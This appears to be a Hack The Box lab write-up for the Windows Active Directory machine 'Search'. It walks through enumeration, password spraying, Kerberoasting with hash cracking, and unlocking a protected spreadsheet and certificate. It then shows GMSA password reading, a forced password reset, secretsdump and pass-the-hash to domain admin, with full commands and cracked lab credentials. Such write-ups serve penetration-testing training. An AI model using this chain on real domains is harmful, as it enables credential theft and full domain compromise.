Now some little information about the target we are dealing with bruh relax man i know it hard but guess what it fun at the end it just all about trying harder and get stuck and unstuck XD.
Now since you know it windows and it rated Hard let jump in already so the hunt begin.
We always start with an nmap scan…..
nmap -p- --min-rate 10000 -oA nmap/allports -v IP
# Nmap 7.91 scan initiated Tue Feb 8 07:33:58 2022 as: nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.11.129
Nmap scan report for 10.10.11.129
Host is up (0.39s latency).
Not shown: 65520 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
8172/tcp open unknown
49676/tcp open unknown
49699/tcp open unknown
49712/tcp open unknown
Read data files from: /usr/bin/../share/nmap
# Nmap done at Tue Feb 8 07:36:38 2022 -- 1 IP address (1 host up) scanned in 160.18 seconds
Let throw some service detection and scripts switch on it to confirm what we have running on each ports.
nmap -sC -sV -oN nmap/normal.tcp -p 80,53,135,139,389,443,445,464,593,636,3268,8172,49676,49712 10.10.11.129
# Nmap 7.91 scan initiated Tue Feb 8 07:38:49 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p 80,53,135,139,389,443,445,464,593,636,3268,8172,49676,49712 10.10.11.129
Nmap scan report for search.htb (10.10.11.129)
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-02-08T09:40:08+00:00; +2h59m35s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-02-08T09:40:08+00:00; +2h59m36s from scanner time.
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-02-08T09:40:08+00:00; +2h59m36s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2022-02-08T09:40:10+00:00; +2h59m35s from scanner time.
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
|_ssl-date: 2022-02-08T09:40:08+00:00; +2h59m36s from scanner time.
| tls-alpn:
|_ http/1.1
49676/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h59m35s, deviation: 0s, median: 2h59m34s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-02-08T09:39:28
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 8 07:40:35 2022 -- 1 IP address (1 host up) scanned in 105.95 seconds
That is a lot of ports man i know but you are panicking already XD just kidding man so we have HTTP, HTTPS, DNS, LDAP, SMB etc. Don’t know about you but am checking SMB first if we have access to anonymous shares.
Now a deadend seems we need credentials to see some shares on SMB just guessing really but high hope of 90/10. Now let check what we have on LDAP use ldapsearch.
ldapsearch -x -h 10.10.11.129 -x -s base namingcontexts
or
ldapsearch -H ldap://10.10.11.129 -x -s base namingcontexts
ldapsearch -x -h 10.10.11.129 -b 'DC=search,DC=htb'
or
ldapsearch -H ldap://10.10.11.129 -x -b "DC=search,DC=htb"
Ahhhh nothing let check what we have running on HTTP.
Seems like a normal static page but guess what we found the domain we can easily add it to /etc/hosts file using echo "10.10.11.129 search.htb" >> /etc/hosts now we are good let burst some directories using gobuster.
/index.html (Status: 200) [Size: 44982]
/images (Status: 301) [Size: 148] [--> http://search.htb/images/]
/main.html (Status: 200) [Size: 931]
/Images (Status: 301) [Size: 148] [--> http://search.htb/Images/]
/staff (Status: 403) [Size: 1233]
/css (Status: 301) [Size: 145] [--> http://search.htb/css/]
/Index.html (Status: 200) [Size: 44982]
/js (Status: 301) [Size: 144] [--> http://search.htb/js/]
/Main.html (Status: 200) [Size: 931]
/Staff (Status: 403) [Size: 1233]
/fonts (Status: 301) [Size: 147] [--> http://search.htb/fonts/]
/IMAGES (Status: 301) [Size: 148] [--> http://search.htb/IMAGES/]
/INDEX.html (Status: 200) [Size: 44982]
/Fonts (Status: 301) [Size: 147] [--> http://search.htb/Fonts/]
/single.html (Status: 200) [Size: 19559]
/*checkout* (Status: 400) [Size: 3420]
Found only the staff directory but when i try to access it i got access denied.
Now back to the homepage to check if we finish anything.
But seems so we missing a slide that is having a scheduled activties let zoom it out.
Seems am right a username and a password i guess.
Name: Hope Sharp
Password: IsolationIsKey?
But it just a name not like a username but not to worry we can use BridgeKeeper to generate usernames from the name we have or doing it manually also.
Now let feed it to crackmapexec .
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ crackmapexec smb search.htb -u usersnames.txt -p 'IsolationIsKey?' --continue-on-success
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hsharp:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hopes:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\h.sharp:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hope.s:IsolationIsKey? STATUS_LOGON_FAILURE
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
Boom we found the username now let access some SMB shares.
Now we have some shares to enumerate let go through it.
Boom more users going through the shares got nothing but seems we have a valid credentials let me break it down.
If you compromise a user that has a valid kerberos ticket-granting ticket (TGT), then you can request one or more ticket-granting service (TGS) service tickets for any Service Principal Name (SPN) from a domain controller. An example SPN would be the Application Server shown in the above figure.
A portion of the TGS ticket is encrypted with the hash of the service account associated with the SPN. Therefore, you can run an offline brute force attack on the encrypted portion to reveal the service account password. Therefore, if you request an administrator account TGS ticket and the administrator is using a weak password, we’ll be able to crack it!
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -dc-ip 10.10.11.129 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 13:59:11.329031 <never>
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) it because of your local time, you need to synchronise the host with the DC: ntpdate IP of DC .
Boom We were able to request a TGS ticket containing a hash for web_svc user let try and crack the hash using john the ripper.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
No password hashes left to crack (see FAQ)
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ john --show hash.txt
?:@3ONEmillionbaby
1 password hash cracked, 0 left
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
Now that we have a password let try password reuses on the usernames we have yes i mean spraying it with crackmapexec maybe any user is using the same password.
Now let hit it with crackmapexec.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ crackmapexec smb search.htb -u users.txt -p @3ONEmillionbaby --continue-on-success
Now we can use it to access SMB.
Now let see what we can get in the SMB shares of user edgar.jacobs .
Boom we have a xlsx file let download it to our target. But when i opened the file which contains firstname, lastname, Username. There is also a protected cell named password which is hided let see how we can recovered that.
Let go through some few tricks which we can use to recover a protected cell.
let make a copy of the document rename the file from Phishing_Attempt.xlsx to Phishing_Attempt.zip after that let unzip it and we should have a folder.
Now let locate the xl folder and then worksheets inside the worksheets now let open the sheet2.xml file.
Now let remove the sheetProtection tag and save file back.
Renaming the file Phishing_Attempt.zip back to Phishing_Attempt.xlsx and when you Open the file you should now be able to read the password cell.
A quick Notice:- I was able to perform this process by using a Windows machine linux keep bringing gibberish.
Now that we have more credentials let spray it again on SMB using crackmapexec XD .
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ crackmapexec smb search.htb -u users.txt -p pass.txt --continue-on-success
Ahhh yes let use it to access the SMB share again to see what we can get in sierra.frye desktop.
Now that we are in let check sierra.frye desktop.
Boom we have user.txt finally going throug the rest dirs we found a backups folder which contains certificate files. After some time doing research, I found out this certificate can be imported into the browser and used by some domains. Trying to import the certificate requires a password. I used crackpkcs12 to crack the password and imported the certificate successfully.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ crackpkcs12 -d /usr/share/wordlists/rockyou.txt staff.pfx -t 10
Dictionary attack - Starting 10 threads
*********************************************************
Dictionary attack - Thread 4 - Password found: misspissy
*********************************************************
Now that we cracked it and we have the password back to https://search.htb/staff/ we know we can import the certificate file on our browser.
Import the staff.pfx certificate file it will ask for a password we already have the password just input it and we are good to go let refresh the page.
Click on ok and boom.
Windows PowerShell Web Access let use the credential we have which is for sierra.frye .
Now we should have a powershell console ready for us after login.
Now the headche i try everything to get a reverse shell back to our terminal but damn man AV keep deleting our files even the sharphound.exe i uploaded so since we have a valid credentials let use the bloodhound-python which we can easily use pip3 install bloodhound to get it installed.
bloodhound-python -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -ns 10.10.11.129 -d search.htb -c all
So let give it time after some min we got a json files.
Now we can easily use BloodHound GUI to import all json files. let start it.
sudo neo4j console
Now let start the GUI.
./BloodHound --no-sandbox
So i search for the user we presently have access to now and marked it has owned.
Select Analysis under Pre-Built Analytics Queries click on Shortest Paths to Domain Admins from Owned Principals and we should have the diagram below.
The user SIERRA.FRYE@SEARCH.HTB is a member of the group BIRMINGHAM-ITSEC@SEARCH.HTB. Groups in active directory grant their members any privileges the group itself has. If a group has rights to another principal, users/computers in the group, as well as other groups inside the group inherit those permissions.
So we know the path is like sierra.frye -> ITSEC@search.htb -> BIR-ADFS-GMSA@search.htb -> tristan.davies -> Domain Admin right which should be easy for us to abuse.
ReadGMSAPassword
BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can retrieve the password for the GMSA BIR-ADFS-GMSA@SEARCH.HTB.
Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is mananaged by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).
The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.
Which we can easily abuse now.
Since sierra.frye is a member of the ITSEC@search.htb group, this user has access to all the group permissions. We can easily use gMSADumper on our attacking machine to do that.
python3 gMSADumper.py -d search.htb -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
Now that we have the GMSA hash let check the next step.
GenericAll
The user BIR-ADFS-GMSA@SEARCH.HTB has GenericAll privileges to the user TRISTAN.DAVIES@SEARCH.HTB.
This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.
Since we know this user has GenericAll privileges on tristan.davies, not knowing tristan’s password, I proceed to reset his password using rpcclient using the bir-adfs-gmsa account and the obtained hash.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ rpcclient -U bir-adfs-gmsa$ -W search.htb search.htb --pw-nt-hash 1 ⨯
Enter SEARCH.HTB\bir-adfs-gmsa$'s password:
rpcclient $> setuserinfo2 tristan.davies 23 'password'
rpcclient $>
Now we have successfully change tristan.davies password.
The user TRISTAN.DAVIES@SEARCH.HTB is a member of the group DOMAIN ADMINS@SEARCH.HTB. Groups in active directory grant their members any privileges the group itself has. If a group has rights to another principal, users/computers in the group, as well as other groups inside the group inherit those permissions.
Since we know tristan.davies is a memeber of domain admin we can easily dump all hashes.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ secretsdump.py search.htb/tristan.davies:password@10.10.11.129 -just-dc
Let it rain hashes XD. Now that we have the hashes of the admin we can easily use Pass The Hash to get access to the target to get the root.txt flag.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.129]
└─$ smbclient.py -hashes aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6 administrator@search.htb
We are done Boom hope you have fun.
A quick notice:- i was unable to get a proper cmd shell or powershell since we keep getting blocked by the AV would really love to know if anyone find another way to get a proper shell peace out.
Greeting From Muzec